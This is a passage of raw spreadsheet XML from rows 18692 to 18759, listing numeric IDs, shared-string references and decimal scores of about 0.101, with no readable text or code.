      <c r="B18692" s="2">
        <v>4.7045199E7</v>
      </c>
      <c r="C18692" s="2" t="s">
        <v>18015</v>
      </c>
      <c r="D18692" s="2">
        <v>1.0</v>
      </c>
      <c r="E18692" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18692" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18693" ht="15.75" customHeight="1">
      <c r="A18693" s="1">
        <v>17352.0</v>
      </c>
      <c r="B18693" s="2">
        <v>4.943286E7</v>
      </c>
      <c r="C18693" s="2" t="s">
        <v>18016</v>
      </c>
      <c r="D18693" s="2">
        <v>1.0</v>
      </c>
      <c r="E18693" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18693" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18694" ht="15.75" customHeight="1">
      <c r="A18694" s="1">
        <v>18007.0</v>
      </c>
      <c r="B18694" s="2">
        <v>5.1443818E7</v>
      </c>
      <c r="C18694" s="2" t="s">
        <v>18017</v>
      </c>
      <c r="D18694" s="2">
        <v>1.0</v>
      </c>
      <c r="E18694" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18694" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18695" ht="15.75" customHeight="1">
      <c r="A18695" s="1">
        <v>18167.0</v>
      </c>
      <c r="B18695" s="2">
        <v>5.1921818E7</v>
      </c>
      <c r="C18695" s="2" t="s">
        <v>18018</v>
      </c>
      <c r="D18695" s="2">
        <v>1.0</v>
      </c>
      <c r="E18695" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18695" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18696" ht="15.75" customHeight="1">
      <c r="A18696" s="1">
        <v>18348.0</v>
      </c>
      <c r="B18696" s="2">
        <v>5.2477419E7</v>
      </c>
      <c r="C18696" s="2" t="s">
        <v>18019</v>
      </c>
      <c r="D18696" s="2">
        <v>1.0</v>
      </c>
      <c r="E18696" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18696" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18697" ht="15.75" customHeight="1">
      <c r="A18697" s="1">
        <v>18642.0</v>
      </c>
      <c r="B18697" s="2">
        <v>5.3422132E7</v>
      </c>
      <c r="C18697" s="2" t="s">
        <v>18020</v>
      </c>
      <c r="D18697" s="2">
        <v>1.0</v>
      </c>
      <c r="E18697" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18697" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18698" ht="15.75" customHeight="1">
      <c r="A18698" s="1">
        <v>19063.0</v>
      </c>
      <c r="B18698" s="2">
        <v>5.4596065E7</v>
      </c>
      <c r="C18698" s="2" t="s">
        <v>18021</v>
      </c>
      <c r="D18698" s="2">
        <v>1.0</v>
      </c>
      <c r="E18698" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18698" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18699" ht="15.75" customHeight="1">
      <c r="A18699" s="1">
        <v>19113.0</v>
      </c>
      <c r="B18699" s="2">
        <v>5.4744406E7</v>
      </c>
      <c r="C18699" s="2" t="s">
        <v>18022</v>
      </c>
      <c r="D18699" s="2">
        <v>1.0</v>
      </c>
      <c r="E18699" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18699" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18700" ht="15.75" customHeight="1">
      <c r="A18700" s="1">
        <v>19270.0</v>
      </c>
      <c r="B18700" s="2">
        <v>5.5154153E7</v>
      </c>
      <c r="C18700" s="2" t="s">
        <v>18023</v>
      </c>
      <c r="D18700" s="2">
        <v>1.0</v>
      </c>
      <c r="E18700" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18700" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18701" ht="15.75" customHeight="1">
      <c r="A18701" s="1">
        <v>19403.0</v>
      </c>
      <c r="B18701" s="2">
        <v>5.5580352E7</v>
      </c>
      <c r="C18701" s="2" t="s">
        <v>18024</v>
      </c>
      <c r="D18701" s="2">
        <v>1.0</v>
      </c>
      <c r="E18701" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18701" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18702" ht="15.75" customHeight="1">
      <c r="A18702" s="1">
        <v>19477.0</v>
      </c>
      <c r="B18702" s="2">
        <v>5.585117E7</v>
      </c>
      <c r="C18702" s="2" t="s">
        <v>18025</v>
      </c>
      <c r="D18702" s="2">
        <v>1.0</v>
      </c>
      <c r="E18702" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18702" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18703" ht="15.75" customHeight="1">
      <c r="A18703" s="1">
        <v>19511.0</v>
      </c>
      <c r="B18703" s="2">
        <v>5.5930173E7</v>
      </c>
      <c r="C18703" s="2" t="s">
        <v>18026</v>
      </c>
      <c r="D18703" s="2">
        <v>1.0</v>
      </c>
      <c r="E18703" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18703" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18704" ht="15.75" customHeight="1">
      <c r="A18704" s="1">
        <v>19950.0</v>
      </c>
      <c r="B18704" s="2">
        <v>5.7495651E7</v>
      </c>
      <c r="C18704" s="2" t="s">
        <v>18027</v>
      </c>
      <c r="D18704" s="2">
        <v>1.0</v>
      </c>
      <c r="E18704" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18704" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18705" ht="15.75" customHeight="1">
      <c r="A18705" s="1">
        <v>20183.0</v>
      </c>
      <c r="B18705" s="2">
        <v>1.0500349E7</v>
      </c>
      <c r="C18705" s="2" t="s">
        <v>18028</v>
      </c>
      <c r="D18705" s="2">
        <v>1.0</v>
      </c>
      <c r="E18705" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18705" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18706" ht="15.75" customHeight="1">
      <c r="A18706" s="1">
        <v>20214.0</v>
      </c>
      <c r="B18706" s="2">
        <v>1.07177E7</v>
      </c>
      <c r="C18706" s="2" t="s">
        <v>18029</v>
      </c>
      <c r="D18706" s="2">
        <v>1.0</v>
      </c>
      <c r="E18706" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18706" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18707" ht="15.75" customHeight="1">
      <c r="A18707" s="1">
        <v>20519.0</v>
      </c>
      <c r="B18707" s="2">
        <v>1.3110545E7</v>
      </c>
      <c r="C18707" s="2" t="s">
        <v>18030</v>
      </c>
      <c r="D18707" s="2">
        <v>1.0</v>
      </c>
      <c r="E18707" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18707" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18708" ht="15.75" customHeight="1">
      <c r="A18708" s="1">
        <v>20760.0</v>
      </c>
      <c r="B18708" s="2">
        <v>1.4920325E7</v>
      </c>
      <c r="C18708" s="2" t="s">
        <v>18031</v>
      </c>
      <c r="D18708" s="2">
        <v>1.0</v>
      </c>
      <c r="E18708" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18708" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18709" ht="15.75" customHeight="1">
      <c r="A18709" s="1">
        <v>20908.0</v>
      </c>
      <c r="B18709" s="2">
        <v>1.6282676E7</v>
      </c>
      <c r="C18709" s="2" t="s">
        <v>18032</v>
      </c>
      <c r="D18709" s="2">
        <v>1.0</v>
      </c>
      <c r="E18709" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18709" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18710" ht="15.75" customHeight="1">
      <c r="A18710" s="1">
        <v>21338.0</v>
      </c>
      <c r="B18710" s="2">
        <v>2.1115626E7</v>
      </c>
      <c r="C18710" s="2" t="s">
        <v>18033</v>
      </c>
      <c r="D18710" s="2">
        <v>1.0</v>
      </c>
      <c r="E18710" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18710" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18711" ht="15.75" customHeight="1">
      <c r="A18711" s="1">
        <v>21374.0</v>
      </c>
      <c r="B18711" s="2">
        <v>2.1640092E7</v>
      </c>
      <c r="C18711" s="2" t="s">
        <v>18034</v>
      </c>
      <c r="D18711" s="2">
        <v>1.0</v>
      </c>
      <c r="E18711" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18711" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18712" ht="15.75" customHeight="1">
      <c r="A18712" s="1">
        <v>21395.0</v>
      </c>
      <c r="B18712" s="2">
        <v>2.1801294E7</v>
      </c>
      <c r="C18712" s="2" t="s">
        <v>18035</v>
      </c>
      <c r="D18712" s="2">
        <v>1.0</v>
      </c>
      <c r="E18712" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18712" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18713" ht="15.75" customHeight="1">
      <c r="A18713" s="1">
        <v>21474.0</v>
      </c>
      <c r="B18713" s="2">
        <v>2.2969355E7</v>
      </c>
      <c r="C18713" s="2" t="s">
        <v>18036</v>
      </c>
      <c r="D18713" s="2">
        <v>1.0</v>
      </c>
      <c r="E18713" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18713" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18714" ht="15.75" customHeight="1">
      <c r="A18714" s="1">
        <v>21491.0</v>
      </c>
      <c r="B18714" s="2">
        <v>2.3061029E7</v>
      </c>
      <c r="C18714" s="2" t="s">
        <v>18037</v>
      </c>
      <c r="D18714" s="2">
        <v>1.0</v>
      </c>
      <c r="E18714" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18714" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18715" ht="15.75" customHeight="1">
      <c r="A18715" s="1">
        <v>21508.0</v>
      </c>
      <c r="B18715" s="2">
        <v>2.3150781E7</v>
      </c>
      <c r="C18715" s="2" t="s">
        <v>18038</v>
      </c>
      <c r="D18715" s="2">
        <v>1.0</v>
      </c>
      <c r="E18715" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18715" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18716" ht="15.75" customHeight="1">
      <c r="A18716" s="1">
        <v>21555.0</v>
      </c>
      <c r="B18716" s="2">
        <v>2.3648049E7</v>
      </c>
      <c r="C18716" s="2" t="s">
        <v>18039</v>
      </c>
      <c r="D18716" s="2">
        <v>1.0</v>
      </c>
      <c r="E18716" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18716" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18717" ht="15.75" customHeight="1">
      <c r="A18717" s="1">
        <v>21557.0</v>
      </c>
      <c r="B18717" s="2">
        <v>2.3666188E7</v>
      </c>
      <c r="C18717" s="2" t="s">
        <v>18040</v>
      </c>
      <c r="D18717" s="2">
        <v>1.0</v>
      </c>
      <c r="E18717" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18717" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18718" ht="15.75" customHeight="1">
      <c r="A18718" s="1">
        <v>21926.0</v>
      </c>
      <c r="B18718" s="2">
        <v>2.8440607E7</v>
      </c>
      <c r="C18718" s="2" t="s">
        <v>18041</v>
      </c>
      <c r="D18718" s="2">
        <v>1.0</v>
      </c>
      <c r="E18718" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18718" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18719" ht="15.75" customHeight="1">
      <c r="A18719" s="1">
        <v>22242.0</v>
      </c>
      <c r="B18719" s="2">
        <v>3.2728221E7</v>
      </c>
      <c r="C18719" s="2" t="s">
        <v>18042</v>
      </c>
      <c r="D18719" s="2">
        <v>1.0</v>
      </c>
      <c r="E18719" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18719" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18720" ht="15.75" customHeight="1">
      <c r="A18720" s="1">
        <v>22386.0</v>
      </c>
      <c r="B18720" s="2">
        <v>3.5291239E7</v>
      </c>
      <c r="C18720" s="2" t="s">
        <v>18043</v>
      </c>
      <c r="D18720" s="2">
        <v>1.0</v>
      </c>
      <c r="E18720" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18720" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18721" ht="15.75" customHeight="1">
      <c r="A18721" s="1">
        <v>23020.0</v>
      </c>
      <c r="B18721" s="2">
        <v>4.9939773E7</v>
      </c>
      <c r="C18721" s="2" t="s">
        <v>18044</v>
      </c>
      <c r="D18721" s="2">
        <v>1.0</v>
      </c>
      <c r="E18721" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18721" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18722" ht="15.75" customHeight="1">
      <c r="A18722" s="1">
        <v>23569.0</v>
      </c>
      <c r="B18722" s="2">
        <v>6191000.0</v>
      </c>
      <c r="C18722" s="2" t="s">
        <v>18045</v>
      </c>
      <c r="D18722" s="2">
        <v>1.0</v>
      </c>
      <c r="E18722" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18722" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18723" ht="15.75" customHeight="1">
      <c r="A18723" s="1">
        <v>23714.0</v>
      </c>
      <c r="B18723" s="2">
        <v>7182866.0</v>
      </c>
      <c r="C18723" s="2" t="s">
        <v>18046</v>
      </c>
      <c r="D18723" s="2">
        <v>1.0</v>
      </c>
      <c r="E18723" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18723" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18724" ht="15.75" customHeight="1">
      <c r="A18724" s="1">
        <v>23807.0</v>
      </c>
      <c r="B18724" s="2">
        <v>7847320.0</v>
      </c>
      <c r="C18724" s="2" t="s">
        <v>18047</v>
      </c>
      <c r="D18724" s="2">
        <v>1.0</v>
      </c>
      <c r="E18724" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18724" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18725" ht="15.75" customHeight="1">
      <c r="A18725" s="1">
        <v>23994.0</v>
      </c>
      <c r="B18725" s="2">
        <v>9221569.0</v>
      </c>
      <c r="C18725" s="2" t="s">
        <v>18038</v>
      </c>
      <c r="D18725" s="2">
        <v>1.0</v>
      </c>
      <c r="E18725" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18725" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18726" ht="15.75" customHeight="1">
      <c r="A18726" s="1">
        <v>24063.0</v>
      </c>
      <c r="B18726" s="2">
        <v>9610079.0</v>
      </c>
      <c r="C18726" s="2" t="s">
        <v>18048</v>
      </c>
      <c r="D18726" s="2">
        <v>1.0</v>
      </c>
      <c r="E18726" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18726" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18727" ht="15.75" customHeight="1">
      <c r="A18727" s="1">
        <v>24516.0</v>
      </c>
      <c r="B18727" s="2">
        <v>1.1158585E7</v>
      </c>
      <c r="C18727" s="2" t="s">
        <v>18049</v>
      </c>
      <c r="D18727" s="2">
        <v>1.0</v>
      </c>
      <c r="E18727" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18727" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18728" ht="15.75" customHeight="1">
      <c r="A18728" s="1">
        <v>24899.0</v>
      </c>
      <c r="B18728" s="2">
        <v>1.2308331E7</v>
      </c>
      <c r="C18728" s="2" t="s">
        <v>18050</v>
      </c>
      <c r="D18728" s="2">
        <v>1.0</v>
      </c>
      <c r="E18728" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18728" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18729" ht="15.75" customHeight="1">
      <c r="A18729" s="1">
        <v>25171.0</v>
      </c>
      <c r="B18729" s="2">
        <v>1.3110544E7</v>
      </c>
      <c r="C18729" s="2" t="s">
        <v>18030</v>
      </c>
      <c r="D18729" s="2">
        <v>1.0</v>
      </c>
      <c r="E18729" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18729" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18730" ht="15.75" customHeight="1">
      <c r="A18730" s="1">
        <v>25997.0</v>
      </c>
      <c r="B18730" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C18730" s="2" t="s">
        <v>18051</v>
      </c>
      <c r="D18730" s="2">
        <v>1.0</v>
      </c>
      <c r="E18730" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18730" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18731" ht="15.75" customHeight="1">
      <c r="A18731" s="1">
        <v>26298.0</v>
      </c>
      <c r="B18731" s="2">
        <v>1.6556716E7</v>
      </c>
      <c r="C18731" s="2" t="s">
        <v>18052</v>
      </c>
      <c r="D18731" s="2">
        <v>1.0</v>
      </c>
      <c r="E18731" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18731" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18732" ht="15.75" customHeight="1">
      <c r="A18732" s="1">
        <v>26502.0</v>
      </c>
      <c r="B18732" s="2">
        <v>1.7545248E7</v>
      </c>
      <c r="C18732" s="2" t="s">
        <v>18053</v>
      </c>
      <c r="D18732" s="2">
        <v>1.0</v>
      </c>
      <c r="E18732" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18732" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18733" ht="15.75" customHeight="1">
      <c r="A18733" s="1">
        <v>26568.0</v>
      </c>
      <c r="B18733" s="2">
        <v>1.784844E7</v>
      </c>
      <c r="C18733" s="2" t="s">
        <v>18054</v>
      </c>
      <c r="D18733" s="2">
        <v>1.0</v>
      </c>
      <c r="E18733" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18733" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18734" ht="15.75" customHeight="1">
      <c r="A18734" s="1">
        <v>27349.0</v>
      </c>
      <c r="B18734" s="2">
        <v>2.1476174E7</v>
      </c>
      <c r="C18734" s="2" t="s">
        <v>18055</v>
      </c>
      <c r="D18734" s="2">
        <v>1.0</v>
      </c>
      <c r="E18734" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18734" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18735" ht="15.75" customHeight="1">
      <c r="A18735" s="1">
        <v>27716.0</v>
      </c>
      <c r="B18735" s="2">
        <v>2.3061028E7</v>
      </c>
      <c r="C18735" s="2" t="s">
        <v>18037</v>
      </c>
      <c r="D18735" s="2">
        <v>1.0</v>
      </c>
      <c r="E18735" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18735" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18736" ht="15.75" customHeight="1">
      <c r="A18736" s="1">
        <v>28784.0</v>
      </c>
      <c r="B18736" s="2">
        <v>2.8440606E7</v>
      </c>
      <c r="C18736" s="2" t="s">
        <v>18041</v>
      </c>
      <c r="D18736" s="2">
        <v>1.0</v>
      </c>
      <c r="E18736" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18736" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18737" ht="15.75" customHeight="1">
      <c r="A18737" s="1">
        <v>30454.0</v>
      </c>
      <c r="B18737" s="2">
        <v>3.9456012E7</v>
      </c>
      <c r="C18737" s="2" t="s">
        <v>18056</v>
      </c>
      <c r="D18737" s="2">
        <v>1.0</v>
      </c>
      <c r="E18737" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18737" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18738" ht="15.75" customHeight="1">
      <c r="A18738" s="1">
        <v>30955.0</v>
      </c>
      <c r="B18738" s="2">
        <v>4.742343E7</v>
      </c>
      <c r="C18738" s="2" t="s">
        <v>18057</v>
      </c>
      <c r="D18738" s="2">
        <v>1.0</v>
      </c>
      <c r="E18738" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18738" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18739" ht="15.75" customHeight="1">
      <c r="A18739" s="1">
        <v>30962.0</v>
      </c>
      <c r="B18739" s="2">
        <v>4.7437055E7</v>
      </c>
      <c r="C18739" s="2" t="s">
        <v>18058</v>
      </c>
      <c r="D18739" s="2">
        <v>1.0</v>
      </c>
      <c r="E18739" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18739" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18740" ht="15.75" customHeight="1">
      <c r="A18740" s="1">
        <v>31367.0</v>
      </c>
      <c r="B18740" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C18740" s="2" t="s">
        <v>18059</v>
      </c>
      <c r="D18740" s="2">
        <v>1.0</v>
      </c>
      <c r="E18740" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18740" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18741" ht="15.75" customHeight="1">
      <c r="A18741" s="1">
        <v>31370.0</v>
      </c>
      <c r="B18741" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C18741" s="2" t="s">
        <v>18060</v>
      </c>
      <c r="D18741" s="2">
        <v>1.0</v>
      </c>
      <c r="E18741" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18741" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18742" ht="15.75" customHeight="1">
      <c r="A18742" s="1">
        <v>31373.0</v>
      </c>
      <c r="B18742" s="2">
        <v>4.9939772E7</v>
      </c>
      <c r="C18742" s="2" t="s">
        <v>18061</v>
      </c>
      <c r="D18742" s="2">
        <v>1.0</v>
      </c>
      <c r="E18742" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18742" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18743" ht="15.75" customHeight="1">
      <c r="A18743" s="1">
        <v>31432.0</v>
      </c>
      <c r="B18743" s="2">
        <v>5.0154876E7</v>
      </c>
      <c r="C18743" s="2" t="s">
        <v>18062</v>
      </c>
      <c r="D18743" s="2">
        <v>1.0</v>
      </c>
      <c r="E18743" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18743" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18744" ht="15.75" customHeight="1">
      <c r="A18744" s="1">
        <v>31473.0</v>
      </c>
      <c r="B18744" s="2">
        <v>5.0480999E7</v>
      </c>
      <c r="C18744" s="2" t="s">
        <v>18063</v>
      </c>
      <c r="D18744" s="2">
        <v>1.0</v>
      </c>
      <c r="E18744" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18744" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18745" ht="15.75" customHeight="1">
      <c r="A18745" s="1">
        <v>31669.0</v>
      </c>
      <c r="B18745" s="2">
        <v>5179616.0</v>
      </c>
      <c r="C18745" s="2" t="s">
        <v>18064</v>
      </c>
      <c r="D18745" s="2">
        <v>1.0</v>
      </c>
      <c r="E18745" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18745" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18746" ht="15.75" customHeight="1">
      <c r="A18746" s="1">
        <v>31785.0</v>
      </c>
      <c r="B18746" s="2">
        <v>5.2327867E7</v>
      </c>
      <c r="C18746" s="2" t="s">
        <v>18065</v>
      </c>
      <c r="D18746" s="2">
        <v>1.0</v>
      </c>
      <c r="E18746" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18746" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18747" ht="15.75" customHeight="1">
      <c r="A18747" s="1">
        <v>32457.0</v>
      </c>
      <c r="B18747" s="2">
        <v>5671041.0</v>
      </c>
      <c r="C18747" s="2" t="s">
        <v>18066</v>
      </c>
      <c r="D18747" s="2">
        <v>1.0</v>
      </c>
      <c r="E18747" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18747" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18748" ht="15.75" customHeight="1">
      <c r="A18748" s="1">
        <v>32815.0</v>
      </c>
      <c r="B18748" s="2">
        <v>6190999.0</v>
      </c>
      <c r="C18748" s="2" t="s">
        <v>18045</v>
      </c>
      <c r="D18748" s="2">
        <v>1.0</v>
      </c>
      <c r="E18748" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18748" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18749" ht="15.75" customHeight="1">
      <c r="A18749" s="1">
        <v>33106.0</v>
      </c>
      <c r="B18749" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C18749" s="2" t="s">
        <v>18067</v>
      </c>
      <c r="D18749" s="2">
        <v>1.0</v>
      </c>
      <c r="E18749" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18749" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18750" ht="15.75" customHeight="1">
      <c r="A18750" s="1">
        <v>33842.0</v>
      </c>
      <c r="B18750" s="2">
        <v>9013437.0</v>
      </c>
      <c r="C18750" s="2" t="s">
        <v>18068</v>
      </c>
      <c r="D18750" s="2">
        <v>1.0</v>
      </c>
      <c r="E18750" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18750" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="18751" ht="15.75" customHeight="1">
      <c r="A18751" s="1">
        <v>6084.0</v>
      </c>
      <c r="B18751" s="2">
        <v>4.7682541E7</v>
      </c>
      <c r="C18751" s="2" t="s">
        <v>18069</v>
      </c>
      <c r="D18751" s="2">
        <v>1.0</v>
      </c>
      <c r="E18751" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18751" s="2">
        <v>0.1012544802867383</v>
      </c>
    </row>
    <row r="18752" ht="15.75" customHeight="1">
      <c r="A18752" s="1">
        <v>32630.0</v>
      </c>
      <c r="B18752" s="2">
        <v>5850398.0</v>
      </c>
      <c r="C18752" s="2" t="s">
        <v>18070</v>
      </c>
      <c r="D18752" s="2">
        <v>1.0</v>
      </c>
      <c r="E18752" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18752" s="2">
        <v>0.1012544802867383</v>
      </c>
    </row>
    <row r="18753" ht="15.75" customHeight="1">
      <c r="A18753" s="1">
        <v>3726.0</v>
      </c>
      <c r="B18753" s="2">
        <v>3.9613612E7</v>
      </c>
      <c r="C18753" s="2" t="s">
        <v>18071</v>
      </c>
      <c r="D18753" s="2">
        <v>1.0</v>
      </c>
      <c r="E18753" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18753" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18754" ht="15.75" customHeight="1">
      <c r="A18754" s="1">
        <v>14030.0</v>
      </c>
      <c r="B18754" s="2">
        <v>3.750169E7</v>
      </c>
      <c r="C18754" s="2" t="s">
        <v>18072</v>
      </c>
      <c r="D18754" s="2">
        <v>1.0</v>
      </c>
      <c r="E18754" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18754" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18755" ht="15.75" customHeight="1">
      <c r="A18755" s="1">
        <v>17649.0</v>
      </c>
      <c r="B18755" s="2">
        <v>5.0419409E7</v>
      </c>
      <c r="C18755" s="2" t="s">
        <v>18073</v>
      </c>
      <c r="D18755" s="2">
        <v>1.0</v>
      </c>
      <c r="E18755" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18755" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18756" ht="15.75" customHeight="1">
      <c r="A18756" s="1">
        <v>25735.0</v>
      </c>
      <c r="B18756" s="2">
        <v>1.4588432E7</v>
      </c>
      <c r="C18756" s="2" t="s">
        <v>18074</v>
      </c>
      <c r="D18756" s="2">
        <v>1.0</v>
      </c>
      <c r="E18756" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18756" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18757" ht="15.75" customHeight="1">
      <c r="A18757" s="1">
        <v>26698.0</v>
      </c>
      <c r="B18757" s="2">
        <v>1.8139317E7</v>
      </c>
      <c r="C18757" s="2" t="s">
        <v>18075</v>
      </c>
      <c r="D18757" s="2">
        <v>1.0</v>
      </c>
      <c r="E18757" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18757" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18758" ht="15.75" customHeight="1">
      <c r="A18758" s="1">
        <v>27681.0</v>
      </c>
      <c r="B18758" s="2">
        <v>2.2972405E7</v>
      </c>
      <c r="C18758" s="2" t="s">
        <v>12836</v>
      </c>
      <c r="D18758" s="2">
        <v>1.0</v>
      </c>
      <c r="E18758" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18758" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18759" ht="15.75" customHeight="1">
      <c r="A18759" s="1">
        <v>28225.0</v>
      </c>
      <c r="B18759" s="2">
